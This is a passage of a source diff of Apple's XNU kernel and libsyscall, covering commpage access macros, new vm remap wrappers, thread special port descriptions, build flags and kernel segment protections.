                        vm_kernel_page_shift = I386_PGSHIFT;
                }
 #else
-               vm_kernel_page_shift = *(uint8_t*) _COMM_PAGE_KERNEL_PAGE_SHIFT;
+               vm_kernel_page_shift = COMM_PAGE_READ(uint8_t, KERNEL_PAGE_SHIFT);
 #endif
                vm_kernel_page_size = 1 << vm_kernel_page_shift;
                vm_kernel_page_mask = vm_kernel_page_size - 1;
@@ -151,12 +151,12 @@ mach_init_doit(void)
 
        if (vm_page_shift == 0) {
 #if defined(__arm64__)
-               vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_64;
+               vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_64);
 #elif defined(__arm__)
-               vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_32;
+               vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_32);
 #else
-               if ((*((uint16_t *)_COMM_PAGE_VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION)) {
-                       vm_page_shift = *(uint8_t*) _COMM_PAGE_USER_PAGE_SHIFT_64;
+               if (COMM_PAGE_READ(uint16_t, VERSION) >= COMM_PAGE_KERNEL_PAGE_SHIFT_MIN_VERSION) {
+                       vm_page_shift = COMM_PAGE_READ(uint8_t, USER_PAGE_SHIFT_64);
                } else {
                        vm_page_shift = vm_kernel_page_shift;
                }
index 6a305be025887feb46690e91038bc02bd33300c4..d9f5649887e13fd0b31a47fbcb1db76fb2ebbba5 100644 (file)
@@ -439,7 +439,7 @@ mach_port_space_basic_info(
 }
 
 static inline mach_port_t
-_tsd_get_special_reply_port()
+_tsd_get_special_reply_port(void)
 {
        return (mach_port_t)(uintptr_t)_os_tsd_get_direct(__TSD_MACH_SPECIAL_REPLY);
 }
index 8b8dfa3fa4374fc78184baafb6af7ec2602a4c5c..365d9a94bc5af08661ea8b0108dd8f356abec4f0 100644 (file)
@@ -222,6 +222,36 @@ mach_vm_remap(
        return rv;
 }
 
+kern_return_t
+mach_vm_remap_new(
+       mach_port_name_t target,
+       mach_vm_address_t *address,
+       mach_vm_size_t size,
+       mach_vm_offset_t mask,
+       int flags,
+       mach_port_name_t src_task,
+       mach_vm_address_t src_address,
+       boolean_t copy,
+       vm_prot_t *cur_protection,
+       vm_prot_t *max_protection,
+       vm_inherit_t inheritance)
+{
+       kern_return_t rv;
+
+       /* {max,cur}_protection is inout */
+       rv = _kernelrpc_mach_vm_remap_new(target, address, size, mask, flags,
+           src_task, src_address, copy, cur_protection, max_protection,
+           inheritance);
+
+       if (__syscall_logger && rv == KERN_SUCCESS) {
+               int eventTypeFlags = stack_logging_type_vm_allocate | stack_logging_type_mapped_file_or_shared_mem;
+               int userTagFlags = flags & VM_FLAGS_ALIAS_MASK;
+               __syscall_logger(eventTypeFlags | userTagFlags, (uintptr_t)target, (uintptr_t)size, 0, (uintptr_t)*address, 0);
+       }
+
+       return rv;
+}
+
 kern_return_t
 mach_vm_read(
        mach_port_name_t target,
@@ -301,6 +331,36 @@ vm_remap(
        return rv;
 }
 
+kern_return_t
+vm_remap_new(
+       mach_port_name_t target,
+       vm_address_t *address,
+       vm_size_t size,
+       vm_offset_t mask,
+       int flags,
+       mach_port_name_t src_task,
+       vm_address_t src_address,
+       boolean_t copy,
+       vm_prot_t *cur_protection,
+       vm_prot_t *max_protection,
+       vm_inherit_t inheritance)
+{
+       kern_return_t rv;
+
+       /* {max,cur}_protection is inout */
+       rv = _kernelrpc_vm_remap_new(target, address, size, mask, flags,
+           src_task, src_address, copy, cur_protection, max_protection,
+           inheritance);
+
+       if (__syscall_logger) {
+               int eventTypeFlags = stack_logging_type_vm_allocate | stack_logging_type_mapped_file_or_shared_mem;
+               int userTagFlags = flags & VM_FLAGS_ALIAS_MASK;
+               __syscall_logger(eventTypeFlags | userTagFlags, (uintptr_t)target, (uintptr_t)size, 0, (uintptr_t)*address, 0);
+       }
+
+       return rv;
+}
+
 kern_return_t
 vm_read(
        mach_port_name_t target,
index 2e086c80d061ccf1a7943b9e67e02238ba244bc7..acf8c8390bf088b8535bf467f68a269f5ca257c3 100644 (file)
@@ -29,6 +29,7 @@
 #include <errno.h>
 #include <mach/host_special_ports.h>
 #include <mach/task_special_ports.h>
+#include <mach/thread_special_ports.h>
 #include <mach/port_descriptions.h>
 #include <stdlib.h>
 #include <strings.h>
@@ -71,8 +72,9 @@ mach_host_special_port_description(int port)
                [HOST_SYSPOLICYD_PORT] = "syspolicyd",
                [HOST_FILECOORDINATIOND_PORT] = "filecoordinationd",
                [HOST_FAIRPLAYD_PORT] = "fairplayd",
+               [HOST_IOCOMPRESSIONSTATS_PORT] = "I/O compression stats",
        };
-       _Static_assert(HOST_FAIRPLAYD_PORT == HOST_MAX_SPECIAL_PORT,
+       _Static_assert(HOST_IOCOMPRESSIONSTATS_PORT == HOST_MAX_SPECIAL_PORT,
            "all host special ports must have descriptions");
 
        return hsp_descs[port_index];
@@ -92,6 +94,8 @@ mach_task_special_port_description(int port)
                [TASK_HOST_PORT] = "host",
                [TASK_NAME_PORT] = "name",
                [TASK_BOOTSTRAP_PORT] = "bootstrap",
+               [TASK_INSPECT_PORT] = "inspect",
+               [TASK_READ_PORT] = "read",
                [TASK_SEATBELT_PORT] = "seatbelt",
                [TASK_ACCESS_PORT] = "access",
                [TASK_DEBUG_CONTROL_PORT] = "debug control",
@@ -103,6 +107,26 @@ mach_task_special_port_description(int port)
        return tsp_descs[port_index];
 }
 
+const char *
+mach_thread_special_port_description(int port)
+{
+       int port_index = (int)port;
+
+       if (port_index < 0 || port_index > THREAD_MAX_SPECIAL_PORT) {
+               return NULL;
+       }
+
+       static const char *tsp_descs[] = {
+               [THREAD_KERNEL_PORT] = "kernel",
+               [THREAD_INSPECT_PORT] = "inspect",
+               [THREAD_READ_PORT] = "read",
+       };
+       _Static_assert(THREAD_READ_PORT == THREAD_MAX_SPECIAL_PORT,
+           "all thread special ports must have descriptions");
+
+       return tsp_descs[port_index];
+}
+
 static int
 port_for_id_internal(const char *id, const char **ids, int nids)
 {
@@ -166,10 +190,25 @@ mach_task_special_port_for_id(const char *id)
                SP_ENTRY(TASK_HOST_PORT),
                SP_ENTRY(TASK_NAME_PORT),
                SP_ENTRY(TASK_BOOTSTRAP_PORT),
+               SP_ENTRY(TASK_INSPECT_PORT),
+               SP_ENTRY(TASK_READ_PORT),
                SP_ENTRY(TASK_SEATBELT_PORT),
                SP_ENTRY(TASK_ACCESS_PORT),
                SP_ENTRY(TASK_DEBUG_CONTROL_PORT),
                SP_ENTRY(TASK_RESOURCE_NOTIFY_PORT),
+       };
+
+       return port_for_id_internal(id, tsp_ids,
+                  sizeof(tsp_ids) / sizeof(tsp_ids[0]));
+}
+
+int
+mach_thread_special_port_for_id(const char *id)
+{
+       static const char *tsp_ids[] = {
+               SP_ENTRY(THREAD_KERNEL_PORT),
+               SP_ENTRY(THREAD_INSPECT_PORT),
+               SP_ENTRY(THREAD_READ_PORT),
 #undef SP_ENTRY
        };
 
diff --git a/libsyscall/mach/task.c b/libsyscall/mach/task.c
new file mode 100644 (file)
index 0000000..b93a0a2
--- /dev/null
@@ -0,0 +1,47 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+#undef _task_user_
+#include <mach/task_internal.h>
+
+extern mach_port_t      mach_task_self_;
+
+boolean_t
+mach_task_is_self(task_name_t task)
+{
+       boolean_t is_self;
+       kern_return_t kr;
+
+       if (task == mach_task_self_) {
+               return TRUE;
+       }
+
+       kr = _kernelrpc_mach_task_is_self(task, &is_self);
+
+       return kr == KERN_SUCCESS && is_self;
+}
index a763dfae471641dced6385c5e2d167ab28e0e5f3..ccd2b33e34ca52be82b4ced60da93f6db15feda6 100644 (file)
@@ -55,9 +55,8 @@ __commpage_gettimeofday_internal(struct timeval *tp, uint64_t *tbr_out)
        volatile uint64_t *gtod_Ticks_scale_p;
        volatile uint64_t *gtod_Ticks_per_sec_p;
 
-       new_commpage_timeofday_data_t *commpage_timeofday_datap;
-
-       commpage_timeofday_datap =  (new_commpage_timeofday_data_t *)_COMM_PAGE_NEWTIMEOFDAY_DATA;
+       COMM_PAGE_SLOT_TYPE(new_commpage_timeofday_data_t) commpage_timeofday_datap =
+           COMM_PAGE_SLOT(new_commpage_timeofday_data_t, NEWTIMEOFDAY_DATA);
 
        gtod_TimeStamp_tick_p = &commpage_timeofday_datap->TimeStamp_tick;
        gtod_TimeStamp_sec_p = &commpage_timeofday_datap->TimeStamp_sec;
index 6440b6098f6cd4cdf70795726ed3d7ff0ebf8388..d1eac6f21eb14a56f5a14a25215ba585e1a0775a 100644 (file)
@@ -30,6 +30,7 @@
 #include <stdbool.h>
 #include <strings.h>
 #include <unistd.h>
+#include <mach/vm_page_size.h>
 #include "_libkernel_init.h"
 
 extern int mach_init(void);
@@ -81,6 +82,19 @@ __libkernel_init(_libkernel_functions_t fns,
                _dlsym = fns->dlsym;
        }
        mach_init();
+#if TARGET_OS_OSX
+       for (size_t i = 0; envp[i]; i++) {
+
+#if defined(__i386__) || defined(__x86_64__)
+               const char *VM_KERNEL_PAGE_SHIFT_ENV = "VM_KERNEL_PAGE_SIZE_4K=1";
+               if (vm_kernel_page_shift != 12 && strcmp(VM_KERNEL_PAGE_SHIFT_ENV, envp[i]) == 0) {
+                       vm_kernel_page_shift = 12;
+                       vm_kernel_page_size = 1 << vm_kernel_page_shift;
+                       vm_kernel_page_mask = vm_kernel_page_size - 1;
+               }
+#endif /* defined(__i386__) || defined(__x86_64__) */
+       }
+#endif /* TARGET_OS_OSX */
 }
 
 void
index e09f849cce42cc9eb38abb4201a1860fc8ac7795..01d462b4954b65187109575dd62dd237f0930ac6 100644 (file)
@@ -33,12 +33,7 @@ getiopolicy_np(int iotype, int scope)
        int policy, error;
        struct _iopol_param_t iop_param;
 
-       if ((iotype != IOPOL_TYPE_DISK && iotype != IOPOL_TYPE_VFS_ATIME_UPDATES && iotype != IOPOL_TYPE_VFS_MATERIALIZE_DATALESS_FILES) ||
-           (scope != IOPOL_SCOPE_PROCESS && scope != IOPOL_SCOPE_THREAD)) {
-               errno = EINVAL;
-               policy = -1;
-               goto exit;
-       }
+       /* Do not sanity check iotype and scope, leave it to kernel. */
 
        iop_param.iop_scope = scope;
        iop_param.iop_iotype = iotype;
index d7409d5419169383e98735e9deed9074f1c0b5ce..af00595629b7ff08cd4e27cf0ab2189c361bd02c 100644 (file)
@@ -84,7 +84,7 @@ kdebug_typefilter(void)
 bool
 kdebug_is_enabled(uint32_t debugid)
 {
-       uint32_t state = *((volatile uint32_t *)(uintptr_t)(_COMM_PAGE_KDEBUG_ENABLE));
+       uint32_t state = COMM_PAGE_READ(uint32_t, KDEBUG_ENABLE);
 
        if (state == 0) {
                return FALSE;
@@ -119,7 +119,7 @@ kdebug_is_enabled(uint32_t debugid)
 bool
 kdebug_using_continuous_time(void)
 {
-       uint32_t state = *((volatile uint32_t *)(uintptr_t)(_COMM_PAGE_KDEBUG_ENABLE));
+       uint32_t state = COMM_PAGE_READ(uint32_t, KDEBUG_ENABLE);
        return state & KDEBUG_ENABLE_CONT_TIME;
 }
 
index cb199cf070182dd288f17ebb2d87347a4ce198a3..50fc667b9f20fa466e171d9812462c855b58b979 100644 (file)
@@ -30,9 +30,8 @@ extern uint64_t mach_absolute_time(void);
 uint64_t
 mach_approximate_time(void)
 {
-       uint8_t supported = *((uint8_t *)_COMM_PAGE_APPROX_TIME_SUPPORTED);
-       if (supported) {
-               return *((uint64_t *)_COMM_PAGE_APPROX_TIME);
+       if (COMM_PAGE_READ(uint8_t, APPROX_TIME_SUPPORTED)) {
+               return COMM_PAGE_READ(uint64_t, APPROX_TIME);
        }
        return mach_absolute_time();
 }
index 5028f3a65b459570443d0331490f1adc78ab552d..4a262e5e3bb05006c7981dac1bbc7d8e7786f2a1 100644 (file)
@@ -25,5 +25,5 @@
 uint64_t
 mach_boottime_usec(void)
 {
-       return *(uint64_t*)_COMM_PAGE_BOOTTIME_USEC;
+       return COMM_PAGE_READ(uint64_t, BOOTTIME_USEC);
 }
index e9084603442edeb94ada4f0853e5f6e24d518625..1158c2431eee3639ab7bcfa185ce1e7392266c57 100644 (file)
@@ -50,7 +50,8 @@ mach_bridge_remote_time(__unused uint64_t local_time)
        uint64_t now = 0;
        struct bt_params params = {};
 
-       volatile struct bt_params *commpage_bt_params_p = (struct bt_params *)_COMM_PAGE_REMOTETIME_PARAMS;
+       COMM_PAGE_SLOT_TYPE(struct bt_params) commpage_bt_params_p =
+           COMM_PAGE_SLOT(struct bt_params, REMOTETIME_PARAMS);
        volatile uint64_t *base_local_ts_p = &commpage_bt_params_p->base_local_ts;
        volatile uint64_t *base_remote_ts_p = &commpage_bt_params_p->base_remote_ts;
        volatile double *rate_p = &commpage_bt_params_p->rate;
index f51db78e454a0e7ccc1d26aad35577a73c78a589..ba650e974f1dd5110009f28e9aaaf5903ba8cd33 100755 (executable)
@@ -33,7 +33,9 @@ cd $OBJROOT
 MIG=`xcrun -sdk "$SDKROOT" -find mig`
 MIGCC=`xcrun -sdk "$SDKROOT" -find cc`
 export MIGCC
-MIG_DEFINES="-DLIBSYSCALL_INTERFACE"
+[ -n "$DRIVERKITROOT" ] && MIG_DRIVERKIT_DEFINES="-DDRIVERKIT"
+MIG_DEFINES="-DLIBSYSCALL_INTERFACE $MIG_DRIVERKIT_DEFINES"
+MIG_PRIVATE_DEFINES="-DPRIVATE -D_OPEN_SOURCE_ -D__OPEN_SOURCE__"
 MIG_HEADER_OBJ="$OBJROOT/mig_hdr/include/mach"
 MIG_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/mach"
 MIG_PRIVATE_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/local/include/mach"
@@ -41,8 +43,7 @@ SERVER_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/servers"
 MACH_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/include/mach"
 MACH_PRIVATE_HEADER_DST="$BUILT_PRODUCTS_DIR/mig_hdr/local/include/mach"
 MIG_INTERNAL_HEADER_DST="$BUILT_PRODUCTS_DIR/internal_hdr/include/mach"
-MIG_INCFLAGS="-I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/usr/include -I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/usr/local/include"
-MIG_PRIVATE_DEFS_INCFLAGS="-I${SDKROOT}/${SDK_INSTALL_HEADERS_ROOT}/System/Library/Frameworks/System.framework/PrivateHeaders"
+MIG_INCFLAGS="-I${SRCROOT}/../osfmk"
 SRC="$SRCROOT/mach"
 FILTER_MIG="$SRCROOT/xcodescripts/filter_mig.awk"
 
@@ -96,6 +97,7 @@ fi
 
 MIGS_INTERNAL="mach_port.defs
        mach_vm.defs
+       task.defs
        thread_act.defs
        vm_map.defs"
 
@@ -161,7 +163,7 @@ mkdir -p $MIG_PRIVATE_HEADER_DST
 
 for mig in $MIGS_PRIVATE $MIGS_DUAL_PUBLIC_PRIVATE; do
        MIG_NAME=`basename $mig .defs`
-       $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_PRIVATE_HEADER_DST/$MIG_NAME.h" $MIG_DEFINES $MIG_INCFLAGS $MIG_PRIVATE_DEFS_INCFLAGS $SRC/$mig
+       $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_PRIVATE_HEADER_DST/$MIG_NAME.h" $MIG_DEFINES $MIG_PRIVATE_DEFINES $MIG_INCFLAGS $SRC/$mig
        if [ ! -e "$MIG_HEADER_DST/$MIG_NAME.h" ]; then
                echo "#error $MIG_NAME.h unsupported." > "$MIG_HEADER_DST/$MIG_NAME.h"
        fi
@@ -178,4 +180,4 @@ for mig in $MIGS_INTERNAL; do
        MIG_NAME=`basename $mig .defs`
        $MIG -novouchers -arch $MACHINE_ARCH -cc $MIGCC -header "$MIG_INTERNAL_HEADER_DST/${MIG_NAME}_internal.h" $MIG_INCFLAGS $SRC/$mig
 done
\ No newline at end of file
index 63dd0de0346b8aee8d490586f8b0f0e295cf3afd..32ac9d6d58745c7cfb195ed92b3461db024aaf78 100644 (file)
@@ -209,6 +209,9 @@ endif
 ifeq ($(NMEDIT),)
        export NMEDIT := $(shell $(XCRUN) -sdk $(SDKROOT) -find nmedit)
 endif
+ifeq ($(SCAN_BUILD),)
+       export SCAN_BUILD := $(shell $(XCRUN) -sdk $(SDKROOT) -find scan-build)
+endif
 
 #
 # Platform options
@@ -258,6 +261,7 @@ SLEEP = /bin/sleep
 AWK = /usr/bin/awk
 SED = /usr/bin/sed
 PLUTIL = /usr/bin/plutil
+GREP = /usr/bin/grep
 
 #
 # Command to generate host binaries. Intentionally not
index 5c5ef1a9263da31d04609489b476b938e100181f..b2e90a4a3367bc616b92bf9c2e55d65530220f38 100644 (file)
@@ -59,18 +59,18 @@ COMPONENT_LIST      = osfmk bsd libkern iokit pexpert libsa security san
 COMPONENT      = $(if $(word 2,$(subst /, ,$(RELATIVE_SOURCE_PATH))),$(word 2,$(subst /, ,$(RELATIVE_SOURCE_PATH))),$(firstword $(subst /, ,$(RELATIVE_SOURCE_PATH))))
 COMPONENT_IMPORT_LIST = $(filter-out $(COMPONENT),$(COMPONENT_LIST))
 
-MACHINE_FLAGS_ARM64_T7000 = -DARM64_BOARD_CONFIG_T7000
-MACHINE_FLAGS_ARM64_T7001 = -DARM64_BOARD_CONFIG_T7001
-MACHINE_FLAGS_ARM64_S8000 = -DARM64_BOARD_CONFIG_S8000
-MACHINE_FLAGS_ARM64_S8001 = -DARM64_BOARD_CONFIG_S8001
+MACHINE_FLAGS_ARM64_T7000 = -DARM64_BOARD_CONFIG_T7000 -mcpu=apple-h7
+MACHINE_FLAGS_ARM64_T7001 = -DARM64_BOARD_CONFIG_T7001 -mcpu=apple-h7
+MACHINE_FLAGS_ARM64_S8000 = -DARM64_BOARD_CONFIG_S8000 -mcpu=apple-h8
+MACHINE_FLAGS_ARM64_S8001 = -DARM64_BOARD_CONFIG_S8001 -mcpu=apple-h8
 MACHINE_FLAGS_ARM_T8002 = -DARM_BOARD_CONFIG_T8002
 MACHINE_FLAGS_ARM_T8004 = -DARM_BOARD_CONFIG_T8004
 MACHINE_FLAGS_ARM64_T8010 = -DARM64_BOARD_CONFIG_T8010 -mcpu=hurricane
 MACHINE_FLAGS_ARM64_T8011 = -DARM64_BOARD_CONFIG_T8011 -mcpu=hurricane
 MACHINE_FLAGS_ARM64_BCM2837 = -DARM64_BOARD_CONFIG_BCM2837
 MACHINE_FLAGS_ARM64_T8020 = -DARM64_BOARD_CONFIG_T8020 -mcpu=vortex
-MACHINE_FLAGS_ARM64_T8101 = -DARM64_BOARD_CONFIG_T8101 -D__ARM_ARCH_8_5__=1
-MACHINE_FLAGS_ARM64_T8103 = -DARM64_BOARD_CONFIG_T8103 -D__ARM_ARCH_8_5__=1
+MACHINE_FLAGS_ARM64_T8101 = -DARM64_BOARD_CONFIG_T8101 -mcpu=apple-a14
+MACHINE_FLAGS_ARM64_T8103 = -DARM64_BOARD_CONFIG_T8103 -mcpu=apple-a14
 
 
 #
@@ -575,6 +575,10 @@ LDFLAGS_KERNEL_RELEASEX86_64 = \
        -Wl,-sectalign,__HIB,__cstring,0x1000 \
        -Wl,-rename_section,__DATA,__const,__DATA_CONST,__const \
        -Wl,-segprot,__DATA_CONST,r--,r-- \
+       -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \
+       -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \
+       -Wl,-segprot,__KLDDATA,rw-,rw- \
+       -Wl,-segprot,__KLD,r-x,r-x \
        -Wl,-no_zero_fill_sections \
        $(LDFLAGS_NOSTRIP_FLAG)
 
@@ -616,7 +620,11 @@ LDFLAGS_KERNEL_GENARM = \
        -Wl,-static \
        -Wl,-image_base,0x80001000 \
        -Wl,-sectalign,__DATA,__const,0x1000 \
-       -Wl,-u,___udivmoddi4
+       -Wl,-u,___udivmoddi4 \
+       -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \
+       -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \
+       -Wl,-segprot,__KLDDATA,rw-,rw- \
+       -Wl,-segprot,__KLD,r-x,r-x
 
 LDFLAGS_KERNEL_RELEASEARM     = \
        $(LDFLAGS_KERNEL_GENARM) \
@@ -685,6 +693,10 @@ LDFLAGS_KERNEL_GENARM64 = \
        -Wl,-rename_section,__DATA,__auth_got,__DATA_CONST,__auth_got \
        -Wl,-rename_section,__DATA,__const,__DATA_CONST,__const \
        -Wl,-segprot,__DATA_CONST,r--,r-- \
+       -Wl,-rename_section,__KLD,__const,__KLDDATA,__const \
+       -Wl,-rename_section,__KLD,__cstring,__KLDDATA,__cstring \
+       -Wl,-segprot,__KLDDATA,rw-,rw- \
+       -Wl,-segprot,__KLD,r-x,r-x \
        -Wl,-rename_section,__TEXT,__text,__TEXT_EXEC,__text \
        -Wl,-rename_section,__TEXT,__stubs,__TEXT_EXEC,__stubs \
        -Wl,-sectcreate,"__PLK_TEXT_EXEC",__text,/dev/null \
@@ -695,8 +707,8 @@ LDFLAGS_KERNEL_GENARM64 = \
 
 LDFLAGS_KERNEL_SEGARM64 = \
        -Wl,-rename_section,__PPLDATA,__const,__PPLDATA_CONST,__const \
-       -Wl,-segment_order,__TEXT:__DATA_CONST:__LINKEDIT:__TEXT_EXEC:__PPLTEXT:__PPLTRAMP:__PPLDATA_CONST:__LASTDATA_CONST:__LAST:__PPLDATA:__KLD:__DATA:__HIBDATA:__BOOTDATA \
-       -Wl,-segprot,__PPLTEXT,r-x,r-x  -Wl,-segprot,__PPLTRAMP,r-x,r-x -Wl,-segprot,__PPLDATA_CONST,r--,r-- -Wl,-segprot,__LASTDATA_CONST,r--,r-- -Wl,-segprot,__LAST,r-x,r-x
+       -Wl,-segment_order,__TEXT:__DATA_CONST:__LINKEDIT:__TEXT_EXEC:__KLD:__PPLTEXT:__PPLTRAMP:__PPLDATA_CONST:__LASTDATA_CONST:__LAST:__PPLDATA:__KLDDATA:__DATA:__HIBDATA:__BOOTDATA \
+       -Wl,-segprot,__PPLTEXT,r-x,r-x  -Wl,-segprot,__PPLTRAMP,r-x,r-x -Wl,-segprot,__PPLDATA_CONST,r--,r-- -Wl,-segprot,__LASTDATA_CONST,r--,r-- -Wl,-segprot,__LAST,r-x,r-x \
 
 LDFLAGS_KERNEL_RELEASEARM64     = \
        $(LDFLAGS_KERNEL_GENARM64) \
index ae727ba022f986ffebb5c1dc460776201c06124f..59300b656456f5f3a016c6c63c48f6a6e45ddd60 100644 (file)
@@ -49,6 +49,7 @@
 #include <IOKit/IOCFUnserialize.h>
 #endif
 
+#if CONFIG_USER_NOTIFICATION
 /*
  * DEFINES AND STRUCTURES
  */
@@ -409,6 +410,7 @@ convert_port_to_UNDReply(
        }
        return UND_REPLY_NULL;
 }
+#endif
 
 /*
  *      User interface for setting the host UserNotification Daemon port.
@@ -419,7 +421,12 @@ host_set_UNDServer(
        host_priv_t     host_priv,
        UNDServerRef    server)
 {
+#if CONFIG_USER_NOTIFICATION
        return host_set_user_notification_port(host_priv, server);
+#else
+#pragma unused(host_priv, server)
+       return KERN_NOT_SUPPORTED;
+#endif
 }
 
 /*
@@ -431,5 +438,10 @@ host_get_UNDServer(
        host_priv_t     host_priv,
        UNDServerRef    *serverp)
 {
+#if CONFIG_USER_NOTIFICATION
        return host_get_user_notification_port(host_priv, serverp);
+#else
+#pragma unused(host_priv, serverp)
+       return KERN_NOT_SUPPORTED;
+#endif
 }
index 44610bf50a674505a70ff3df0db1ad281c2b5496..8fadbf4e74dede629a19723a4bdd0e78ab80ca80 100644 (file)
@@ -124,6 +124,14 @@ uint64_t interrupt_masked_timeout = 0xd0000;
 uint64_t stackshot_interrupt_masked_timeout = 0xf9999;
 #endif
 
+/*
+ * A 6-second timeout will give the watchdog code a chance to run
+ * before a panic is triggered by the xcall routine.
+ */
+#define XCALL_ACK_TIMEOUT_NS ((uint64_t) 6000000000)
+uint64_t xcall_ack_timeout_abstime;
+
+
 boot_args const_boot_args __attribute__((section("__DATA, __const")));
 boot_args      *BootArgs __attribute__((section("__DATA, __const")));
 
@@ -146,6 +154,8 @@ SECURITY_READ_ONLY_LATE(boolean_t) diversify_user_jop = TRUE;
 SECURITY_READ_ONLY_LATE(uint64_t) gDramBase;
 SECURITY_READ_ONLY_LATE(uint64_t) gDramSize;
 
+SECURITY_READ_ONLY_LATE(bool) serial_console_enabled = false;
+
 /*
  * Forward definition
  */
@@ -435,7 +445,11 @@ arm_init(
        }
 
        PE_parse_boot_argn("interrupt_masked_debug_timeout", &interrupt_masked_timeout, sizeof(interrupt_masked_timeout));
-#endif
+
+#endif /* INTERRUPT_MASKED_DEBUG */
+
+       nanoseconds_to_absolutetime(XCALL_ACK_TIMEOUT_NS, &xcall_ack_timeout_abstime);
+
 
 #if HAS_BP_RET
        PE_parse_boot_argn("bpret", &bp_ret, sizeof(bp_ret));
@@ -496,6 +510,7 @@ arm_init(
        }
 
        if (serialmode & SERIALMODE_OUTPUT) {                 /* Start serial if requested */
+               serial_console_enabled = true;
                (void)switch_to_serial_console(); /* Switch into serial mode */
                disableConsoleOutput = FALSE;     /* Allow printfs to happen */
        }
index 35f66e5eeebbcd355e38309d83ca691b083fae9c..faf5013e27b1b454ac00b21237cfaa9ef0f80c09 100644 (file)
@@ -111,6 +111,8 @@ vm_offset_t            segLINKB;
 static unsigned long   segSizeLINK;
 static vm_offset_t     segKLDB;
 static unsigned long   segSizeKLD;
+static vm_offset_t     segKLDDATAB;
+static unsigned long   segSizeKLDDATA;
 static vm_offset_t     segLASTB;
 static vm_offset_t     segLASTDATACONSTB;
 static unsigned long   segSizeLASTDATACONST;
@@ -330,6 +332,7 @@ arm_vm_prot_init(boot_args * args)
        arm_vm_page_granular_RNX((vm_offset_t)&fiqstack_high_guard, PAGE_MAX_SIZE, TRUE);
 
        arm_vm_page_granular_ROX(segKLDB, segSizeKLD, force_coarse_physmap);
+       arm_vm_page_granular_RNX(segKLDDATAB, segSizeKLDDATA, force_coarse_physmap);
        arm_vm_page_granular_RWNX(segLINKB, segSizeLINK, force_coarse_physmap);
        arm_vm_page_granular_RWNX(segLASTB, segSizeLAST, FALSE); // __LAST may be empty, but we cannot assume this
        if (segLASTDATACONSTB) {
@@ -481,6 +484,7 @@ arm_vm_init(uint64_t memory_size, boot_args * args)
        segDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__DATA", &segSizeDATA);
        segLINKB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LINKEDIT", &segSizeLINK);
        segKLDB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLD", &segSizeKLD);
+       segKLDDATAB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__KLDDATA", &segSizeKLDDATA);
        segLASTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LAST", &segSizeLAST);
        segLASTDATACONSTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__LASTDATA_CONST", &segSizeLASTDATACONST);
        segPRELINKTEXTB = (vm_offset_t) getsegdatafromheader(&_mh_execute_header, "__PRELINK_TEXT", &segSizePRELINKTEXT);
index ef4fe3d84b2f2554329a1c93e68852a9b2eef295..084d863a9e9e503f9f3c83f9567674d0f0ffca84 100644 (file)
@@ -34,7 +34,6 @@
 #include <mach/thread_status.h>
 #include <mach/vm_param.h>
 
-#include <kern/counters.h>
 #include <kern/cpu_data.h>
 #include <arm/cpu_data_internal.h>
 #include <kern/mach_param.h>
diff --git a/osfmk/arm/counter.c b/osfmk/arm/counter.c
new file mode 100644 (file)
index 0000000..552e538
--- /dev/null
@@ -0,0 +1,81 @@
+/* * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
